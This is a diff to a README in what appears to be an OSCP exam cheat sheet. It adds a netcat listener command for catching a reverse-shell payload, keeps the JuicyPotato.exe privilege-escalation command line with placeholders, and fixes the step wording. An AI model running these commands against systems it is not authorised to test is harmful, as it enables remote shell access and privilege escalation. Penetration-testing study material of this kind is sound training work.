pharo-sec/OSCP-Cheat-Sheet/README.md

 ### Execution

-Create the listener to cath the payload then run:
+Create the listener to cath the payload

+<code>nc -lnvp [PORT]</code>

+Run the exploit on the target host.

 <code>JuicyPotato.exe -l 1337 -p [DIR\TO\EXPLOIT] -t * -c {CLSID}</code>